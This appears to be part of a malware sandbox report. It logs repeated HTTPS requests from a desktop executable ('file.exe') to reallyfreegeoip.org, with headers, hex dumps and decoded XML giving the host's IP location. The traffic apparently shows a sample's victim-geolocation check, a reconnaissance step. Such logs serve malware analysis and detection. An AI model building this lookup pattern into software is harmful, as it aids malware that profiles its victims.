                                                                                                                                                2024-12-31 08:15:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-31 08:15:19 UTC852INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:19 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947708
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCGwsg4TwYGl2uhDgTXvFc6f279AUSnT7%2BeTJkkGfeVhL0xiBxXHyXzR3OQLcGJkEBqv2wkZCCBlV5LKdH9GSnrufTUmUIRzv4GPMqEFtTAv13ibsdlLVc9%2BcDC0GBUW6SnOUn2u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d234ca69de98-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1612&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1724748&cwnd=212&unsent_bytes=0&cid=ab2f1d9ed68c2a3a&ts=404&x=0"
                                                                                                                                                2024-12-31 08:15:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449749188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-12-31 08:15:22 UTC858INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:22 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947711
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mdutkp9zyRhBt7azPC0GhQ1AeGdqL%2B9Q0gGwyc%2FB8CEHI%2BCiSDPuUuoRoZhaIcVZ6TcrhJcO3sKcSjl4DHa9wOO44Zu5xoiPI%2Bf1q3hhDH%2FZAWdxDNXMJRbXzOgpJGFOa9TOiJ0K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d243ac0cc335-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1481&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1880231&cwnd=165&unsent_bytes=0&cid=a4c340736b328d0c&ts=137&x=0"
                                                                                                                                                2024-12-31 08:15:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449751188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:24 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-12-31 08:15:24 UTC858INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:24 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947713
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KojpzFBs2UBz7e2KQk2FbqYkSgH9HK86bveW%2FnbyCmcKkr%2Bn7AUwXmwTwo76fM2GaiuOMAe8bGmi9PnJbLUsK5uLBuGcQFOI3ooswf3fk0Sk2fl2m7z%2Bkk%2BCLtmEvsP0BZXhLt%2B5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d2534bdf4379-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2047&rtt_var=776&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1403846&cwnd=194&unsent_bytes=0&cid=bcb786a768cfe9bb&ts=136&x=0"
                                                                                                                                                2024-12-31 08:15:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449753188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-31 08:15:27 UTC852INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:27 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947716
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nj8oY4j1O4fDGnJlJOpnRgfpdLJTJq2Xl0YU5e4leuFh8qcrQtzDzGtdl6H%2FplKItlk7%2F3MktRAcLuPyqMHxeXquUFyO1UhDrKI20wZqJCqAtwlvyga9E1CtJHjAof1k4vbOY5La"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d264690cc44a-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1606&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1737061&cwnd=228&unsent_bytes=0&cid=0a5d6bd44ba3216f&ts=154&x=0"
                                                                                                                                                2024-12-31 08:15:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.449755188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-12-31 08:15:28 UTC852INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:28 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947718
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWxOHsI4VkLW2cKkzNsUJ56FhKoJRfNk6x%2FYN2kBwOCpIYxOJPug9aMQpFG3zjh7w0wS8nB1PR8gMxrVLxLkMJ%2FnKGb42UV9hmatbBUiqeEQkrkFRVkWwMJ8kSvMoVXjR7AE2DEh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d26d88810f8f-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1613&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=232&unsent_bytes=0&cid=3a69907d4f7ab80c&ts=142&x=0"
                                                                                                                                                2024-12-31 08:15:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.449757188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-31 08:15:30 UTC862INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:30 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947719
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kSakzmaJOiXfehYY3Q%2Bcq7srurT8mJz7php3%2BTgFq7eOC0pu0%2BYhButksxzqdV6XBUoz8%2BnWYzdEY19rDJvoT7jZyHgAX0pvq%2BC4hSGaR9suRh%2F8OKCQ5aIcXABqdWH%2BPNW3b2N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d2758a699e04-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2034&rtt_var=770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1414043&cwnd=236&unsent_bytes=0&cid=45dc4e090994216d&ts=156&x=0"
                                                                                                                                                2024-12-31 08:15:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.449759188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:31 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-12-31 08:15:31 UTC862INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:31 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947721
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKt1dBh%2B%2BxBzlrCugcvABIAhLk1Ota66ZCqTl8CsQLx23p8aZHMRyr9H7ryppjXk6xEeaecOp%2BSaHZ%2FmHQ0eJO%2BlKjw0L8Z6%2FENFcwwUnxHzhxauJKNnMdVqrNQ9ykUBWdj7y%2FpQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d2804a6b17ad-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1608&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1783750&cwnd=171&unsent_bytes=0&cid=d18344af85c8b892&ts=159&x=0"
                                                                                                                                                2024-12-31 08:15:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.449761188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-31 08:15:33 UTC856INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:33 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947722
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9x4L7xoGzfDJsXTOG7l4bp%2FX9S8My6LssnGuzbKZdoJXxr3zCn%2F4ZGEn1EenkRfyE%2B96vywbzroj6NgWIbNjthgzy9dHnQABR39Rz4Xa5MHt50eDr0bSI1BlSKD5uUA7nmR%2F6y2k"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d28b6d7dc32f-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1479&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1949265&cwnd=139&unsent_bytes=0&cid=c2e62998a8022a44&ts=154&x=0"
                                                                                                                                                2024-12-31 08:15:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.449763188.114.96.34437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-31 08:15:35 UTC858INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:35 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Age: 947725
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                cf-cache-status: HIT
                                                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHSOCzJoQsgBI7Rgt7TmLmZxgnDrEY2TH%2F%2F1VdLkZyz9CacT%2BQxZcljTj7UcWlNz167umrw25TLtEGqBCP7en%2BA%2Bv8kK2jEStvodcFC9DXOmdzErQ2XZpgNnNTVdRh0tpTQjlbgU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa8d299785642c3-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1671&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1724748&cwnd=203&unsent_bytes=0&cid=0a6d9b24565c0229&ts=154&x=0"
                                                                                                                                                2024-12-31 08:15:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
